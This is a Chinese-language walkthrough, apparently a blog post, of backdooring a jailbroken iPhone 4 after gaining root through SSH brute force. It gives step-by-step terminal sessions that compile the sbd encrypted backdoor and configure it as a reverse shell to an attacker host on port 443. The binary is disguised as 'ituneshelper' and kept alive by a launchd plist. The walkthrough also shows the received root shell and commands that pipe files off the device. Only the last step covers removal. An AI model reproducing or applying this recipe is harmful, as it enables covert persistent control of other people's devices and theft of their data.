小编:sbd是一款小型后门,且具有较强大的加密功能,是居家旅行杀人越货谋财害命之必备佳品(安全测试工具请勿非法使用),下载地址: http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz
在一次安全渗透测试中,我通过ssh暴力破解拿到了一台iphone4(已越狱)的权限。于是我成功的SSH连接上这台设备,安装了一个持久的TCP反弹后门(sbd-1.36 by Michel Blomgren)
接下来来详细说明所有的步骤:
1. 安装iphone-gcc:
iphone4:~ root# uname -an Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin iphone4:~ root# apt-get update Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B] Hit http://cydia.zodttd.com stable Release.gpg Hit http://apt.saurik.com ios/675.00 Release.gpg Hit http://repo.insanelyi.com ./ Release.gpg ... iphone4:~ root# apt-get install iphone-gcc Reading package lists... Done Building dependency tree Reading state information... Done ... Setting up ldid (610-5) ... Setting up com.sull.iphone-gccheaders (1.0-11) ... Setting up com.sull.fake-libgcc (1.0-2) ... Setting up iphone-gcc (4.2-20080604-1-8) ... iphone4:~/sbd-1.36 root# apt-get install make Reading package lists... Done Building dependency tree Reading state information... Done ... Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ... Setting up make (3.81-2) ...
2. 下载sbd后门:
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz --2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz Resolving packetstorm.tacticalflex.com... 173.160.180.156 Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 84093 (82K) [application/x-gzip] Saving to: `sbd-1.36.tar.gz' 100%[======================================>] 84,093 66.3K/s in 1.2s 2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093] iphone4:~ root# tar -zxvf sbd-1.36.tar.gz sbd-1.36/ sbd-1.36/sbd.c sbd-1.36/doexec.c sbd-1.36/pel.c sbd-1.36/aes.c sbd-1.36/sha1.c sbd-1.36/socket_code.h sbd-1.36/pel.h sbd-1.36/aes.h sbd-1.36/sha1.h sbd-1.36/sbd.h sbd-1.36/doexec_unix.h sbd-1.36/doexec_win32.h sbd-1.36/readwrite.h sbd-1.36/misc.h sbd-1.36/Makefile sbd-1.36/mktarball.sh sbd-1.36/README sbd-1.36/COPYING sbd-1.36/CHANGES sbd-1.36/binaries/ sbd-1.36/binaries/sbd.exe sbd-1.36/binaries/sbdbg.exe iphone4:~ root# cd sbd-1.36 iphone4:~/sbd-1.36 root# ls -al total 224 drwx------ 3 1000 100 748 Sep 17 2004 ./ drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../ -rw------- 1 1000 100 1876 Sep 17 2004 CHANGES -rw------- 1 1000 100 18007 Jun 8 2004 COPYING -rw------- 1 1000 100 2176 Jun 20 2004 Makefile -rw------- 1 1000 100 4880 Sep 11 2004 README -rw------- 1 1000 100 31370 Jun 12 2004 aes.c -rw------- 1 1000 100 549 Jun 11 2004 aes.h drwx------ 2 1000 100 136 Sep 11 2004 binaries/ -rw------- 1 1000 100 77 Jun 2 2004 doexec.c -rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h -rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h -rw------- 1 1000 100 14968 Sep 9 2004 misc.h -rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh* -rw------- 1 1000 100 13381 Sep 8 2004 pel.c -rw------- 1 1000 100 898 Sep 9 2004 pel.h -rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h -rw------- 1 1000 100 20557 Sep 9 2004 sbd.c -rw------- 1 1000 100 2014 Jun 8 2004 sbd.h -rw------- 1 1000 100 8900 Jun 2 2004 sha1.c -rw------- 1 1000 100 436 Jun 2 2004 sha1.h -rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h
3. 在编译前配置Sbd(我把Sbd配置成了一个守护进程,所有的参数包括反弹IP、端口、密码、加密设置等等):
iphone4:~/sbd-1.36 root# cat sbd.h #define SOURCE_PORT 0 #define CONVERT_TO_CRLF 0 #define ENCRYPTION 1 #define SHARED_SECRET "password" #define QUIET 0 #define VERBOSE 0 #define DAEMONIZE 0 #define HIGHLIGHT_INCOMING 0 #define HIGHLIGHT_PREFIX "\x1b[0;32m" #define HIGHLIGHT_SUFFIX "\x1b[0m" #define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": " #define RUN_ONLY_ONE_INSTANCE 0 #define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore" /* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash. * reconnect every 10 seconds. */ #define DOLISTEN 0 #define HOST "192.168.200.22" #define PORT 443 #define RESPAWN_ENABLED 1 #define RESPAWN_INTERVAL 10 #define EXECPROG "/bin/bash"
然后你可以选择性的使用以下参数:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443
4. 编译过程:
iphone4:~/sbd-1.36 root# make usage: make unix - Linux, NetBSD, FreeBSD, OpenBSD make sunos - SunOS (Solaris) make win32 - native win32 console app (w/ Cygwin + MinGW) make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW) make win32bg CFLAGS=-DSTEALTH - stealthy no-console app make mingw - native win32 console app (w/ MinGW MSYS) make mingwbg - native win32 no-console app (w/ MinGW MSYS) make cygwin - Cygwin console app make darwin - Darwin iphone4:~/sbd-1.36 root# make darwin rm -f sbd sbd.exe *.o core gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c strip sbd iphone4:~/sbd-1.36 root# ls -al sbd -rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*
5. 配置守护进程 (为了持久)
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/ iphone4:/Library/LaunchDaemons root# ls -al total 16 drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./ drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../ -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.ituneshelper.start</string> <key>ProgramArguments</key> <array> <string>/usr/bin/ituneshelper</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>1</integer> </dict> </plist> EOF iphone4:/Library/LaunchDaemons root# ls -al total 16 drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./ drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../ -rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
6. 连接(from Linux box):
root@coresec:~# uname -an Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux root@coresec:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:03:72:5e inet addr:192.168.200.22 Bcast:192.168.200.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:14741 errors:0 dropped:0 overruns:0 frame:0 TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:20159805 (20.1 MB) TX bytes:720669 (720.6 KB) root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password id uid=0(root) gid=0(wheel) groups=0(wheel) /bin/bash -i bash: no job control in this shell bash-4.0# ps -ef UID PID PPID C STIME TTY TIME CMD 0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd 0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System 0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd 0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd 0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd 25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic 501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard 501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled 0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd 0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd 0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd 0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd 0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid 501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd 501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd 501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted 65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd 501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent 501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd 0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd 501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90 501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd 501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd 501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated 501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer 501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd 0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper 0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd 501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail 501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone 0 286 94 0 0:00.00 ?? 0:00.03 bash 0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i 0 303 300 0 0:00.00 ?? 0:00.01 ps -ef bash-4.0# uname -an Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
7. 如果你想与被控制的iphone间传送文件,你可以用以下参数使用sbd:
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
8. 删除后门也很简单:
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper